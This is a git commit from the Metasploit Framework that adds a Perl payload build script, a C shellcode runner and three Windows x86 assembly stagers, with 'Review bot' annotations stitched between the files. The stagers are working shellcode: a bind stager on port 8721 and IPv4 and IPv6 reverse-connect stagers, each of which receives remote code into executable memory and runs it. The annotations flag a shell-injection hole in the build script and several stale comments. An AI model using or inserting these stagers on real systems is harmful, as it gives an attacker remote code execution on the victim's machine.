Updated README, include the templates and other src

git-svn-id: file:///home/svn/framework3/trunk@5637 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2008-08-22 18:45:33 +00:00
parent ed379dddf5
commit 7d2bb9536a
17 changed files with 15964 additions and 3 deletions


@ -1,7 +1,7 @@
This directory contains the win32 payload development environment used This directory contains the win32 payload development environment used
for creating the payloads in version 3 of the Metasploit Framework. for creating the payloads in version 3 of the Metasploit Framework.
The 'nasm' executable must be in your path to use the included build tool. The 'nasm' executable must be in your path to use the included build.sh tool.
The included 'build' script automatically creates a number of file types The included 'build' script automatically creates a number of file types
each time it used to compile a payload. These file types are: each time it used to compile a payload. These file types are:
@ -13,6 +13,6 @@ each time it used to compile a payload. These file types are:
The PE executable templates were developed by 'rix' and used with permission. The PE executable templates were developed by 'rix' and used with permission.
To use this script, simply run ./build <name of payload>, where the name To use this script, simply run ./build.sh <name of payload>, where the name
does not include the ".asm" suffix. To build win32_stage_api.asm, the does not include the ".asm" suffix. To build win32_stage_api.asm, the
command line would be "./build win32_stage_api". command line would be "./build.sh win32_stage_api".

173
external/source/shellcode/windows/build.sh vendored Executable file

@ -0,0 +1,173 @@
#!/usr/bin/perl
###############
##
# Name: build
# Author: H D Moore <hdm [at] metasploit.com>
# Description: Command-line tool for building/extracting asm payloads
# License: GPL / Perl Artistic
##
my $name = shift();
if (! $name || $name =~ /\./) { print STDERR "Usage: $0 <name>\n"; exit(0); }
if ($name eq 'clean') {
system("rm -f *.bin *.exe *.c *.elf");
exit(0);
}
# Compile the asm
unlink("$name.bin");
system("nasm -f bin -O3 -o $name.bin $name.asm");
if (! -f "$name.bin") {
exit(0);
}
# Load binary
my $bindata;
open(X, "<$name.bin") || exit(0);
$bindata = join('',<X>);
close(X);
print "# Length: " . length($bindata) . " bytes\n";
# Print out common offsets into the payload data
my $suffix;
my $port = index($bindata, pack("n", 8721));
if ($port != -1) {
print "# Port: $port\n";
}
my $host = index($bindata, gethostbyname("127.0.0.1"));
if ($host != -1) {
print "# Host: $host\n";
}
my $psize = index($bindata, pack("L", 0x12345678));
if ($psize != -1) {
print "# Size: $psize\n";
}
my $pstart = index($bindata, pack("L", 0x13370000));
if ($pstart != -1) {
print "# Start: $pstart\n";
}
my $pstart = index($bindata, pack("L", 0x11223344));
if ($pstart != -1) {
print "# Alloc: $pstart\n";
}
my $pstart = index($bindata, pack("L", 0x73e2d87e));
if ($pstart != -1) {
print "# ExitProcess: $pstart\n";
}
my $pstart = index($bindata, pack("L", 0x4cf079fa));
if ($pstart != -1) {
print "# PayloadLen: $pstart\n";
}
my $pstart = index($bindata, "\x8d\x77\x15");
if ($pstart != -1) {
$pstart+=2;
print "# FileStart: $pstart\n";
}
my $pstart = index($bindata, "\x88\x4f\x1a");
if ($pstart != -1) {
$pstart+=2;
print "# FileEnd: $pstart\n";
}
my $pstart = index($bindata, "http");
if ($pstart != -1) {
print "# URL Start: $pstart\n";
}
$x = BufferPerl($bindata);
print $x;
$x = BufferC($bindata);
my $cfile;
while(<DATA>) { $cfile .= $_; }
$cfile =~ s/::SHELLCODE::/$x/g;
open(C, ">$name.c");
print C $cfile;
close (C);
# Build PE
open (X, ">templates/payload.bin") || die "payload.bin: $!";
print X $bindata;
close (X);
chdir("templates") || die "chdir(templates): $!";
unlink("../$name.exe");
system("nasm -I inc/ -f bin -o ../$name.exe win32_template.asm");
# Build ELF
unlink("linux_template.o");
system("nasm -f elf -o linux_template.o linux_template.asm");
if (-f "linux_template.o")
{
system("ld -o ../$name.elf linux_template.o");
unlink("linux_template.o");
}
unlink("payload.bin");
system("chmod 755 *.exe *.elf");
sub BufferPerl
{
my ($data, $width) = @_;
my ($res, $count);
if (! $data) { return }
if (! $width) { $width = 16 }
$res = '"';
$count = 0;
foreach my $char (split(//, $data))
{
if ($count == $width)
{
$res .= '".' . "\n" . '"';
$count = 0;
}
$res .= sprintf("\\x%.2x", ord($char));
$count++;
}
if ($count) { $res .= '";' . "\n"; }
return $res;
}
sub BufferC
{
my ($data, $width) = @_;
my $res = BufferPerl($data, $width);
if (! $res) { return }
$res =~ s/\.//g;
return $res;
}
__DATA__
char code[] =
::SHELLCODE::
int main(int argc, char **argv)
{
int (*funct)();
funct = (int (*)()) code;
(int)(*funct)();
}
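Review bot: `$name`, taken straight from `@ARGV`, is interpolated into shell command strings at `system("nasm -f bin -O3 -o $name.bin $name.asm")` and again at the `nasm -I inc/ ... ../$name.exe` and `ld -o ../$name.elf` calls, while the only filter is the `/\./` rejection in the usage check, so any shell metacharacter in the argument reaches `/bin/sh`. The list form of `system` keeps the shell out of the path entirely, and an anchored character class on `$name` makes the usage check say what it means. The same file has no `use strict; use warnings;`, opens bareword handles with two-arg `open` (`open(X, "<$name.bin")`, and `open(C, ">$name.c")` is unchecked), assigns to the undeclared `$x`, and re-declares `my $pstart` seven times, all of which `warnings` would report. The rewrite below covers the argument check, the first `nasm` call and the binary read; the two later `system` calls follow the same list-form pattern.
```perl
#!/usr/bin/perl
use strict;
use warnings;
# … unchanged: header comment …
my $name = shift();
# The name becomes file names and command arguments, so accept only a bare
# identifier: no dots, slashes or shell metacharacters.
if (! defined $name || $name !~ /\A[\w-]+\z/) { print STDERR "Usage: $0 <name>\n"; exit(0); }
# … unchanged: 'clean' branch …
unlink("$name.bin");
system('nasm', '-f', 'bin', '-O3', '-o', "$name.bin", "$name.asm");
# … unchanged: existence check …
open(my $bin_fh, '<', "$name.bin") or exit(0);
binmode($bin_fh);
my $bindata = do { local $/; <$bin_fh> };
close($bin_fh);
# … unchanged: offset printing, C file generation, PE/ELF build …
```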


@ -0,0 +1,203 @@
; Title: Win32 API Loader
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
; Author: hdm[at]metasploit.com
[BITS 32]
global _start
_start:
call LKernel32Base
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
pop edi
pop esi
pop ebp
pop ebx
ret 8
LKernel32Base:
pop esi
push byte 0x30
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
push ebx ; kernel32.dll base
push 0xec0e4e8e ; LoadLibraryA
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
mov edi, eax
push ebx ; kernel32.dll base
push 0x91afca54 ; VirtualAlloc
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
; ebx = kernel32.dll base
; esi = LGetProcAddress
; edi = LoadLibraryA
; eax = VirtualAlloc
sub esp, 0x100
push eax ; [ebp + 12] = VirtualAlloc
push edi ; [ebp + 8] = LoadLibraryA
push esi ; [ebp + 4] = LGetProcAddress
push ebx ; [ebp + 0] = kernel32.dll base
mov ebp, esp
call LLoadWinsock
%define FN_RECV [ebp + 24]
%define FN_SEND [ebp + 28]
%define FN_ACCEPT [ebp + 32]
%define FN_BIND [ebp + 36]
%define FN_LISTEN [ebp + 40]
%define FN_WSASOCK [ebp + 44]
%define FN_WSASTART [ebp + 48]
LWSDataSegment:
;========================
dd 0x190 ; used by wsastartup
dd 0xe71819b6 ; recv [ebp + 24]
dd 0xe97019a4 ; send [ebp + 28]
dd 0x498649e5 ; accept [ebp + 32]
dd 0xc7701aa4 ; bind [ebp + 36]
dd 0xe92eada4 ; listen [ebp + 40]
dd 0xadf509d9 ; WSASocketA [ebp + 44]
dd 0x3bfcedcb ; WSAStartup [ebp + 48]
db "WS2_32", 0x00
;========================
LLoadWinsock:
pop ebx ; save address to data in ebx
lea ecx, [ebx + 32] ; find address of "WS2_32.DLL"
push ecx ; push address of "WS2_32.DLL"
call edi ; call LoadLibraryA("WS2_32.DLL")
mov edi, ebx ; store base of data section in edi
mov ebx, eax ; store base of winsock in ebx
lea esi, [ebp + 20] ; store base of function table
push byte 0x07 ; load five functions by hash
pop ecx ; configure the counter
Looper:
push ecx ; save the counter
push ebx ; dll handle
push dword [edi + ecx * 4] ; function hash value
call [ebp + 4] ; find the address
pop ecx ; restore the counter
mov [esi + ecx * 4], eax ; stack segment to store addresses
loop Looper
LWSAStartup: ; WSAStartup (0x101, DATA)
sub esp, [edi]
push esp
push dword [edi]
call FN_WSASTART
xor eax, eax
LWSASocketA: ; WSASocketA (2,1,0,0,0,0)
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
call FN_WSASOCK
mov edi, eax
LBind:
xor ebx, ebx
push ebx
push ebx
push dword 0x11220002 ; port 8721
mov eax, esp
push byte 0x10 ; length
push eax
push edi
call FN_BIND
LListen:
push ebx
push edi
call FN_LISTEN
LAccept:
push ebx
push esp
push edi
call FN_ACCEPT
mov edi, eax
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
push byte 0x40
pop esi
push esi ; PAGE_EXECUTE_READWRITE=0x40
shl esi, 6 ; MEM_COMMIT=0x1000
push esi
shl esi, 8 ; 1MB
push esi
push byte 0x00 ; NULL
call [ebp+12]
mov ebx, eax
LRecvLength: ; recv(s, buff, 4, 0)
push byte 0x00 ; flags
push 4096 ; length
push ebx ; buffer
push dword edi ; socket
call FN_RECV ; recv()
call ebx
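Review bot: The comment on `push byte 0x07 ; load five functions by hash` in `LLoadWinsock` says five while the counter is seven, matching the seven hashes in `LWSDataSegment`; it should read `push byte 0x07 ; load seven functions by hash`. The label comment `LRecvLength: ; recv(s, buff, 4, 0)` is followed by `push 4096 ; length`, so the call actually made is `recv(s, buff, 4096, 0)`, and `LWSAStartup: ; WSAStartup (0x101, DATA)` pushes `dword [edi]`, i.e. the 0x190 stored at the start of the data segment, as the version word. The `recv(s, buff, 4, 0)` comment recurs in both reverse-connect stagers below (there the length pushed is `esi`, the 1MB VirtualAlloc size), and the `WSAStartup (0x101, DATA)` comment recurs in the IPv4 reverse stager, which also pushes `dword [edi]`. Updating these label comments to the values actually pushed keeps the three files readable side by side.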


@ -0,0 +1,255 @@
; Title: Windows Reverse Connect Stager (NX, IPv6)
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista
; Author: Metasploit LLC
[BITS 32]
global _start
_start:
call LKernel32Base
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
pop edi
pop esi
pop ebp
pop ebx
ret 8
LKernel32Base:
pop esi
push byte 0x30
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
push ebx ; kernel32.dll base
push dword 0xec0e4e8e ; LoadLibraryA
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
mov edi, eax
push ebx ; kernel32.dll base
push dword 0x91afca54 ; VirtualAlloc
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
; ebx = kernel32.dll base
; esi = LGetProcAddress
; edi = LoadLibraryA
; eax = VirtualAlloc
LBootWinsock:
sub esp, 0x100
push eax ; [ebp + 12] = VirtualAlloc
push edi ; [ebp + 8] = LoadLibraryA
push esi ; [ebp + 4] = LGetProcAddress
push ebx ; [ebp + 0] = kernel32.dll base
mov ebp, esp
call LLoadWinsock
%define FN_RECV [ebp + 24]
%define FN_SEND [ebp + 28]
%define FN_CONNECT [ebp + 32]
%define FN_WSASOCK [ebp + 36]
%define FN_WSASTART [ebp + 40]
LWSDataSegment:
;========================
dd 0x190 ; used by wsastartup
dd 0xe71819b6 ; recv [ebp + 24]
dd 0xe97019a4 ; send [ebp + 28]
dd 0x60aaf9ec ; connect [ebp + 32]
dd 0xadf509d9 ; WSASocketA [ebp + 36]
dd 0x3bfcedcb ; WSAStartup [ebp + 40]
db "WS2_32", 0x00
;========================
LLoadWinsock:
pop ebx ; save address to data in ebx
lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
push ecx ; push address of "WS2_32.DLL"
call edi ; call LoadLibraryA("WS2_32.DLL")
mov edi, ebx ; store base of data section in edi
mov ebx, eax ; store base of winsock in ebx
lea esi, [ebp + 20] ; store base of function table
push byte 0x05 ; load five functions by hash
pop ecx ; configure the counter
Looper:
push ecx ; save the counter
push ebx ; dll handle
push dword [edi + ecx * 4] ; function hash value
call [ebp + 4] ; find the address
pop ecx ; restore the counter
mov [esi + ecx * 4], eax ; stack segment to store addresses
loop Looper
LWSAStartup: ; WSAStartup (0x0202, DATA)
sub esp, [edi]
push esp
push dword 0x0202
call FN_WSASTART
xor eax, eax
LWSASocketA: ; WSASocketA (23,1,6,0,0,0)
; dwFlags
push eax
; RESERVED
push eax
; PROTOCOL INFO
push eax
; PROTOCOL: IPPROTO_TCP
push byte 6
; TYPE: SOCK_STREAM
push byte 1
; FAMILY: AF_INET6
push byte 23
; WSASocket()
call FN_WSASOCK
mov edi, eax
; [ebp + 0] = kernel32.dll base
; [ebp + 4] = LGetProcAddress
; [ebp + 8] = LoadLibraryA
; [ebp + 12] = VirtualAlloc
; [ebp + 24] = recv
; [ebp + 28] = send
; [ebp + 32] = accept
; [ebp + 36] = bind
; [ebp + 40] = connect
; [ebp + 44] = WSASocketA
; [ebp + 48] = WSAStartup
; [ebp + 52] = Payload Length
LConnect:
call LGotAddress
LGetAddress:
; struct sockaddr_in6 {
; short sin6_family;
; u_short sin6_port;
; u_long sin6_flowinfo;
; struct in6_addr sin6_addr;
; u_long sin6_scope_id;
;}
; sin6_family
db 0x17
db 0x00
; sin6_port
db 0xff
db 0xff
dd 0x00000000 ; sin6_flowinfo
; fe80000000000000021b63fffe98bf36
db 0xfe
db 0x80
db 0x00
db 0x00
db 0x00
db 0x00
db 0x00
db 0x00
db 0x02
db 0x1b
db 0x63
db 0xff
db 0xfe
db 0x98
db 0xbf
db 0x36
dd 0x00000000 ; sin6_scope_id
LGotAddress:
pop ecx
push byte 28 ; address length
push ecx
push dword edi
call dword FN_CONNECT
; reconnect on failure
; test eax, eax
; jne short LConnect
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
push byte 0x40
pop esi
push esi ; PAGE_EXECUTE_READWRITE=0x40
shl esi, 6 ; MEM_COMMIT=0x1000
push esi
shl esi, 8 ; 1MB
push esi
push byte 0x00 ; NULL
call [ebp+12]
mov ebx, eax
LRecvLength: ; recv(s, buff, 4, 0)
push byte 0x00 ; flags
push esi ; length
push ebx ; buffer
push dword edi ; socket
call FN_RECV ; recv()
call ebx
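Review bot: The `[ebp + N]` table in the comment block after `mov edi, eax` (from `; [ebp + 0] = kernel32.dll base` through `; [ebp + 52] = Payload Length`) is carried over from the bind stager and contradicts this file's own `%define`s, which put `connect` at `[ebp + 32]`, `WSASocketA` at `[ebp + 36]` and `WSAStartup` at `[ebp + 40]`; there is no accept, bind or payload-length slot in the five-entry `LWSDataSegment` here. The same stale table appears in the IPv4 reverse-connect stager that follows. Replacing it with the five entries actually defined (`recv`, `send`, `connect`, `WSASocketA`, `WSAStartup` at `[ebp + 24]` through `[ebp + 40]`, plus the four kernel32 slots) stops a reader from trusting the wrong offsets.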


@ -0,0 +1,203 @@
; Title: Win32 API Loader
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003, Windows Vista,
; Author: hdm[at]metasploit.com
[BITS 32]
global _start
_start:
call LKernel32Base
LGetProcAddress:
push ebx
push ebp
push esi
push edi
mov ebp, [esp + 24]
mov eax, [ebp + 0x3c]
mov edx, [ebp + eax + 120]
add edx, ebp
mov ecx, [edx + 24]
mov ebx, [edx + 32]
add ebx, ebp
LFnlp:
jecxz LNtfnd
dec ecx
mov esi, [ebx + ecx * 4]
add esi, ebp
xor edi, edi
cld
LHshlp:
xor eax, eax
lodsb
cmp al, ah
je LFnd
ror edi, 13
add edi, eax
jmp short LHshlp
LFnd:
cmp edi, [esp + 20]
jnz LFnlp
mov ebx, [edx + 36]
add ebx, ebp
mov cx, [ebx + 2 * ecx]
mov ebx, [edx + 28]
add ebx, ebp
mov eax, [ebx + 4 * ecx]
add eax, ebp
jmp short LDone
LNtfnd:
xor eax, eax
LDone:
pop edi
pop esi
pop ebp
pop ebx
ret 8
LKernel32Base:
pop esi
push byte 0x30
pop ecx
mov ebx, [fs:ecx]
mov ebx, [ebx + 0x0c]
mov ebx, [ebx + 0x1c]
mov ebx, [ebx]
mov ebx, [ebx + 0x08]
push ebx ; kernel32.dll base
push 0xec0e4e8e ; LoadLibraryA
call esi ; GetProcAddress(kerne32.dll, LoadLibrary)
mov edi, eax
push ebx ; kernel32.dll base
push 0x91afca54 ; VirtualAlloc
call esi ; GetProcAddress(kerne32.dll, VirtualAlloc)
; ebx = kernel32.dll base
; esi = LGetProcAddress
; edi = LoadLibraryA
; eax = VirtualAlloc
LBootWinsock:
sub esp, 0x100
push eax ; [ebp + 12] = VirtualAlloc
push edi ; [ebp + 8] = LoadLibraryA
push esi ; [ebp + 4] = LGetProcAddress
push ebx ; [ebp + 0] = kernel32.dll base
mov ebp, esp
call LLoadWinsock
%define FN_RECV [ebp + 24]
%define FN_SEND [ebp + 28]
%define FN_CONNECT [ebp + 32]
%define FN_WSASOCK [ebp + 36]
%define FN_WSASTART [ebp + 40]
LWSDataSegment:
;========================
dd 0x190 ; used by wsastartup
dd 0xe71819b6 ; recv [ebp + 24]
dd 0xe97019a4 ; send [ebp + 28]
dd 0x60aaf9ec ; connect [ebp + 32]
dd 0xadf509d9 ; WSASocketA [ebp + 36]
dd 0x3bfcedcb ; WSAStartup [ebp + 40]
db "WS2_32", 0x00
;========================
LLoadWinsock:
pop ebx ; save address to data in ebx
lea ecx, [ebx + 24] ; find address of "WS2_32.DLL"
push ecx ; push address of "WS2_32.DLL"
call edi ; call LoadLibraryA("WS2_32.DLL")
mov edi, ebx ; store base of data section in edi
mov ebx, eax ; store base of winsock in ebx
lea esi, [ebp + 20] ; store base of function table
push byte 0x05 ; load five functions by hash
pop ecx ; configure the counter
Looper:
push ecx ; save the counter
push ebx ; dll handle
push dword [edi + ecx * 4] ; function hash value
call [ebp + 4] ; find the address
pop ecx ; restore the counter
mov [esi + ecx * 4], eax ; stack segment to store addresses
loop Looper
LWSAStartup: ; WSAStartup (0x101, DATA)
sub esp, [edi]
push esp
push dword [edi]
call FN_WSASTART
xor eax, eax
LWSASocketA: ; WSASocketA (2,1,0,0,0,0)
push eax
push eax
push eax
push eax
inc eax
push eax
inc eax
push eax
call FN_WSASOCK
mov edi, eax
; [ebp + 0] = kernel32.dll base
; [ebp + 4] = LGetProcAddress
; [ebp + 8] = LoadLibraryA
; [ebp + 12] = VirtualAlloc
; [ebp + 24] = recv
; [ebp + 28] = send
; [ebp + 32] = accept
; [ebp + 36] = bind
; [ebp + 40] = connect
; [ebp + 44] = WSASocketA
; [ebp + 48] = WSAStartup
; [ebp + 52] = Payload Length
LConnect:
push 0x0100007f ; host: 127.0.0.1
push 0x11220002 ; port: 8721
mov ecx, esp
push byte 0x10
push ecx
push dword edi
call dword FN_CONNECT
; reconnect on failure
; test eax, eax
; jne short LConnect
LAllocateMemory: ; VirtualAlloc(NULL,size,MEM_COMMIT,PAGE_EXECUTE_READWRITE)
push byte 0x40
pop esi
push esi ; PAGE_EXECUTE_READWRITE=0x40
shl esi, 6 ; MEM_COMMIT=0x1000
push esi
shl esi, 8 ; 1MB
push esi
push byte 0x00 ; NULL
call [ebp+12]
mov ebx, eax
LRecvLength: ; recv(s, buff, 4, 0)
push byte 0x00 ; flags
push esi ; length
push ebx ; buffer
push dword edi ; socket
call FN_RECV ; recv()
call ebx
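Review bot: The header `; Title: Win32 API Loader` is the bind stager's title, but the code after `LConnect:` pushes `0x0100007f` and `0x11220002` (127.0.0.1:8721 per its own comments) and calls `FN_CONNECT`, so this file is the IPv4 reverse-connect stager; the IPv6 variant above titles itself `Windows Reverse Connect Stager (NX, IPv6)`, and this one should match, e.g. `; Title: Windows Reverse Connect Stager (NX)`. The `; Platforms:` line also ends in a dangling comma after `Windows Vista,`.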


@ -0,0 +1,3 @@
These include files were pulled from rix's site:
http://www.devhell.org/~rix/



@ -0,0 +1,309 @@
; MACROS FOR FUNCTION DECLARATIONS v0.9a
; ======================================
;gérer les appels de fonctions externes C (linux)
;return() ?
;FUNCTION.INC_CONVENTION = C|Std = convention d'appel des fonctions par défaut
;FunctionDefine alias,C|Std|Pascal [,adresse]
; -> FunctionDefine_alias = C|Std|Pascal
; @alias = adresse de la fonction
; alias$ (si aucun paramètre)
; alias([p1,...]) (si plusieurs paramètres)
;Function alias, [,p1,...]
; <- FunctionDefine
; -> @alias = adresse de la fonction
; Function_EBP ebp
; Function_EIP byte ebp+4
;[FunctionResd nom,nombre d]
;[FunctionResw nom,nombre w]
;[FunctionResb nom,nombre b]
;...
;FunctionBegin
; <- Sub
; ...
;FunctionEnd
; <- FUNCTION.INC_CONVENTION,BYTE.INC_NO_00
;FunctionCall alias, [,p1,...]
; <- Push,Call,BYTE.INC_TEMPORARY_REGISTER(push & pop C)
;================================= General ===================================
%ifndef _FUNCTION.INC
%define _FUNCTION.INC
%include "byte.inc"
%macro FUNCTION.INC 0
BYTE.INC
%define FUNCTION.INC_CONVENTION C
%endmacro
%macro FUNCTION.INC~ 0
BYTE.INC~
%define FUNCTION.INC_CONVENTION C
%endmacro
FUNCTION.INC
%macro FunctionDefine 2-3
%define FunctionDefine_%1 %2
%if %0==3
%ifnidni %3,@%1
%define @%1 %3
%endif
%endif
%define %1$ FunctionCall %1
%define %1(p1) FunctionCall %1,p1
%define %1(p1,p2) FunctionCall %1,p1,p2
%define %1(p1,p2,p3) FunctionCall %1,p1,p2,p3
%define %1(p1,p2,p3,p4) FunctionCall %1,p1,p2,p3,p4
%define %1(p1,p2,p3,p4,p5) FunctionCall %1,p1,p2,p3,p4,p5
%define %1(p1,p2,p3,p4,p5,p6) FunctionCall %1,p1,p2,p3,p4,p5,p6
%define %1(p1,p2,p3,p4,p5,p6,p7) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7
%define %1(p1,p2,p3,p4,p5,p6,p7,p8) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19
%define %1(p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19,p20) FunctionCall %1,p1,p2,p3,p4,p5,p6,p7,p8,p9,p10,p11,p12,p13,p14,p15,p16,p17,p18,p19,p20
%endmacro
;================================= Function ==================================
%macro Function 1-*
FUNCTION.INC~
%ifndef Function_%1
%ifctx Function
Error FUNCTION,Function =X=> Function
%else
%push Function
%define Function_%1
%define Function_Name_Define @%1
%ifndef BYTE.INC_NO_00
%define Function_EBP byte ebp
%endif
%define Function_EIP byte ebp+4
FunctionDefine %1,FUNCTION.INC_CONVENTION
%assign Function_Params_Assign 4
%if %0>1
%rotate 1
%rep %0-1
%assign Function_Params_Assign Function_Params_Assign+4
%1_Equ equ Function_Params_Assign
%define %1 byte ebp+%1_Equ
%rotate 1
%endrep
%endif
%assign Function_Locals_Assign 0
%endif
%undef Function_Exist_Define
%else
%define Function_Exist_Define
%endif
%endmacro
%macro FunctionResd 2
%ifndef Function_Exist_Define
%ifctx Function
%assign Function_Locals_Assign Function_Locals_Assign+%2*4
%1_Equ equ Function_Locals_Assign
%if (Function_Locals_Assign < 256)
%define %1 byte ebp-%1_Equ
%else
%define %1 dword ebp-%1_Equ
%ifdef BYTE.INC_NO_00
Warning FUNCTION,FunctionResd %1,%2 => 00 ?
%endif
%endif
%else
Error FUNCTION,FunctionResd => Function
%endif
%endif
%endmacro
%macro FunctionResw 2
%ifndef Function_Exist_Define
%ifctx Function
%assign Function_Locals_Assign Function_Locals_Assign+%2*2
%1_Equ equ Function_Locals_Assign
%if (Function_Locals_Assign < 256)
%define %1 byte ebp-%1_Equ
%else
%define %1 dword ebp-%1_Equ
%ifdef BYTE.INC_NO_00
Warning FUNCTION,FunctionResw %1,%2 => 00 ?
%endif
%endif
%else
Error FUNCTION,FunctionResw => Function
%endif
%endif
%endmacro
%macro FunctionResb 2
%ifndef Function_Exist_Define
%ifctx Function
%assign Function_Locals_Assign Function_Locals_Assign+%2
%1_Equ equ Function_Locals_Assign
%if (Function_Locals_Assign < 256)
%define %1 byte ebp-%1_Equ
%else
%define %1 dword ebp-%1_Equ
%ifdef BYTE.INC_NO_00
Warning FUNCTION,FunctionResb %1,%2 => 00 ?
%endif
%endif
%else
Error FUNCTION,FunctionResb => Function
%endif
%endif
%endmacro
%macro FunctionBegin 0
%ifndef Function_Exist_Define
%ifctx Function
Function_Name_Define:
%define BYTE.INC_TEMPORARY_REGISTER eax
%if (Function_Params_Assign>4)||(Function_Locals_Assign>0)
push ebp
mov ebp,esp
%endif
%if Function_Locals_Assign>0
Sub esp,Function_Locals_Assign
%endif
; enter Function_Locals_Assign,0
%undef BYTE.INC_TEMPORARY_REGISTER
%else
Error FUNCTION,FunctionBegin => Function
%endif
%endif
%endmacro
%macro FunctionEnd 0
%ifndef Function_Exist_Define
%ifctx Function
%if (Function_Params_Assign>4)||(Function_Locals_Assign>0)
leave
%endif
%ifnidni FUNCTION.INC_CONVENTION,C
%if Function_Params_Assign==4
ret
%elifndef BYTE.INC_NO_00
ret Function_Params_Assign-4
%else
Error FUNCTION,NO_00 =X=> CONVENTION Std
%endif
%else
ret
%endif
%undef Function_Name_Define
%pop
%else
Error FUNCTION,FunctionEnd => Function
%endif
%endif
%undef Function_Exist_Define
FUNCTION.INC~
%endmacro
;=================================== Call ====================================
%macro FunctionCallStd 1-*
%define BYTE.INC_TEMPORARY_REGISTER eax
%rep %0-1
%rotate -1
Push %1
%endrep
Call FunctionCall_Address_Define
%undef BYTE.INC_TEMPORARY_REGISTER
%endmacro
%macro FunctionCallPascal 1-*
%define BYTE.INC_TEMPORARY_REGISTER eax
%rep %0-1
%rotate 1
Push %1
%endrep
Call FunctionCall_Address_Define
%undef BYTE.INC_TEMPORARY_REGISTER
%endmacro
%macro FunctionCallC 1-*
%ifndef BYTE.INC_NO_00
%define BYTE.INC_TEMPORARY_REGISTER eax
%else
%ifdef BYTE.INC_TEMPORARY_REGISTER
%ifidni BYTE.INC_TEMPORARY_REGISTER,eax
Error FUNCTION,NO_00 => TEMPORARY_REGISTER <> eax
%endif
%else
Error FUNCTION,NO_00 => TEMPORARY_REGISTER
%endif
%endif
